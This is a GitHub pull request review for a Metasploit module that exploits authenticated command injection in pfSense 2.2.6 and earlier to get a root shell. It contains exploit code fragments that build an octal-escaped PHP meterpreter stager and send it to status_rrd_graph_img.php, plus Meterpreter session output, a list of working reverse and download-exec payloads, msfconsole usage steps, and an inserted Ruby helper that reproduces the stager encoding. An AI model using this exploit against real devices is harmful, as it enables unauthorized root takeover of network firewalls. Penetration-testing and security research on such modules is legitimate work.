pfsense graph <= 2.2.6 exploit #9362
Conversation
Please add module docs to this
added module docs
I have some pfSense VMs from the modules I wrote, so I'll give this a test later today
Sounds great thanks :)
```ruby
end
# If the device isn't fully setup, you get stuck at redirects to wizard.php
# however, this does NOT stop exploitation strangely
print_error("pfSense version not detected or wizard still enabled.")
```
single quotes
```ruby
filename = rand_text_alpha(rand(20))

# generate the PHP meterpreter payload
stager = "echo \'<?php "
```
single quotes
```ruby
# don't look
complete_stage = ""
for i in 0..(stager.length()-1)
  if "#{version}" =~ /2.2/
```
This can be shortened.
```ruby
if version.to_s =~ /2.2/
  complete_stage << '\\'
end
complete_stage << "\\#{stager[i].ord.to_s(8)}"
```
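The loop under review turns every byte of the PHP stager into a `\NNN` octal escape, with a second backslash per byte on 2.2.x. The following is an added example, not code from this pull request or from the Metasploit module: a stand-alone Ruby version of that encoding plus a printf-style decoder, so the encoded stage can be checked to round-trip before it is sent. Two things here are this example's own choices: the anchored `/\A2\.2/` (the reviewed `/2.2/` is unanchored and has an unescaped dot, so it also matches strings such as `12.2` or `2x2`), and the decoder, which the thread never shows. The thread does not say why 2.2.x needs the extra backslash, so the encoder only mirrors it.

```ruby
# Added example (not the pull request's code): reproduce the octal-escape
# encoding of the stager and verify that a printf-style decoder recovers it.

# Encode every byte of +stager+ as "\NNN" (backslash + octal digits), the way
# the reviewed loop does with stager[i].ord.to_s(8). On 2.2.x the module
# prepends a second backslash per byte; the thread does not explain why, so
# this only mirrors that behaviour. The anchored /\A2\.2/ is an assumption of
# this example; the reviewed /2.2/ also matches e.g. "12.2" or "2x2".
def octal_escape(stager, version)
  prefix = version.to_s =~ /\A2\.2/ ? '\\' : ''
  stager.each_byte.map { |b| "#{prefix}\\#{b.to_s(8)}" }.join
end

# Undo the encoding the way a printf-style interpreter would: each "\NNN"
# (one to three octal digits) becomes one byte. A backslash that is followed
# by another backslash (the 2.2.x doubling) is not an escape and is skipped,
# so the same decoder handles both forms. Used here only to check round trips.
def octal_unescape(encoded)
  encoded.scan(/\\([0-7]{1,3})/).flatten.map { |oct| oct.to_i(8) }.pack('C*')
end

if __FILE__ == $0
  stage = "echo '<?php "            # constructed sample, same prefix as the module's stager
  %w[2.1.3 2.2.6].each do |v|
    enc = octal_escape(stage, v)
    puts "#{v}: #{enc}"
    puts "  round-trips: #{octal_unescape(enc) == stage}"
  end
end
```

Because every byte gets its own backslash, at most three octal digits are ever consumed per escape and the decoder never runs two bytes together; that is also why the doubled form decodes without any special handling.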
```ruby
begin
  cookie = login
  version = detect_version(cookie)
  filename = rand_text_alpha(rand(20))
```
20 seems excessive, maybe 8 or 10?
```ruby
'uri' => '/status_rrd_graph_img.php',
'method' => 'GET',
'headers' => {
  'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
```
I don't think all of these headers are required.
My guess is the following could be removed:
- user-agent
- Accept
- Accept-Language
- Accept-Encoding
- Origin
- Connection
```ruby
if res && res.code == 200
  print_status("Triggering the payload, root shell incoming...")
else
  print_error("Failed to upload the initial payload...")
```
single quotes
```ruby
'uri' => '/status_rrd_graph_img.php',
'method' => 'GET',
'headers' => {
  'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
```
you can probably remove a bunch of these headers
```
----      ---------------  --------  -----------
PASSWORD  pfsense          yes       Password to login with
Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST     192.168.75.132   yes       The target address
```
Typically I blank out the LHOST to be 1.1.1.1 and RHOST to 2.2.2.2; not only does it protect potential customer privacy (I see it's a VM here), but it saves a few characters as well.
```
[*] Sending stage (37543 bytes) to 192.168.75.132
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.132:34381) at 2018-01-01 02:07:03 -0600

meterpreter > getuid
```
Usually I throw a `uname -a` in here too; it shows the kernel and architecture. On a set image it isn't as important, but just something for the future.
### pfSense Community Edition 2.2.6-RELEASE

```
msf exploit(unix/http/pfsense_graph_injection_exec) > options
```
Typically I prefer seeing the options being set, i.e.:
```
use unix/http/pfsense_graph_injection_exec
set rhost ...
set ...
```
That takes fewer lines and shows any non-defaults being set, as opposed to `show options`. Just for future note.
I added the requested changes and tested
Against my 2.2.6: php reverse meterp looks good:
php/bind_perl fails. doesn't seem to be a firewall thing since other binds dont fail. Either the perl is not compatible, or something else is going on.
bind meterp is good
bind php is no good
reverse perl also fails.
In the other pfSense module, you see I specified only allowed perl and openssl payloads because all the other ones seemed to fail. You'll want to go through and double check which work and which don't and either debug to figure out why, or exclude them.
So, if I wanted to only allow
```ruby
'Payload' =>
  {
    'Compat' =>
      {
        'PayloadType' => 'reverse_tcp',
        'RequiredCmd' => 'php meterpreter',
      }
  },
```
you set the bind shell port to 80, so when it connected it went to the default web server, assumed it was meterp (incorrectly) and acted like the session was open even though it wasn't. I'm not 100% familiar with this portion of MSF and modifying which payloads are accepted for non-cmd payloads.
Oh yeah, another thing: you may want to look into registering the PHP page that was created for cleanup so it's automatically removed.
Alright, I went ahead and pushed some changes (thank you for recommending FileDropper). When testing, the allowed payloads all seem to work (now). The only issue I have faced is when using php/meterpreter/reverse_tcp.
```
php/download_exec
php/exec
php/meterpreter_reverse_tcp <--- Fail
php/reverse_perl (without cleanup)
php/reverse_perl (with cleanup)
php/reverse_php
```
Oh, I forgot to mention I also changed line 128 to `filename = rand_text_alpha(rand(1..10))`. When using `rand(10)` there were cases where the payload would be uploaded as ' ', which of course would mean nothing gets uploaded.
Strangely, php/meterpreter/reverse_tcp isn't listed for me as a payload.
```ruby
'Space' => 6000,
'Compat' =>
  {
    'Arch' => 'php',
```
If you get rid of this line, the staged meterpreters show back up. I think that's the way to go at this point, and with that last change I'll be happy to land.
Alright, I went ahead and removed the requested line.
Nice work! Welcome to being a contributor 🎈 🎉 .
Release Notes
This module adds an exploit against pfSense firewalls which results in RCE.
Thank you for all the help 😄 !
Description
This module exploits a vulnerability in pfSense versions 2.2.6 and earlier which allows an authenticated user to execute arbitrary operating system commands as root.
Vulnerable Application
This module has been tested successfully on versions 2.2.6-RELEASE, 2.2.5-RELEASE, and 2.1.3-RELEASE.
Installers:
Verification Steps
```
msfconsole
use exploit/unix/http/pfsense_graph_injection_exec
set RHOST [IP]
set USERNAME [username]
set PASSWORD [password]
set LHOST [IP]
exploit
```
Scenarios
pfSense Community Edition 2.2.6-RELEASE
pfSense Community Edition 2.1.3-RELEASE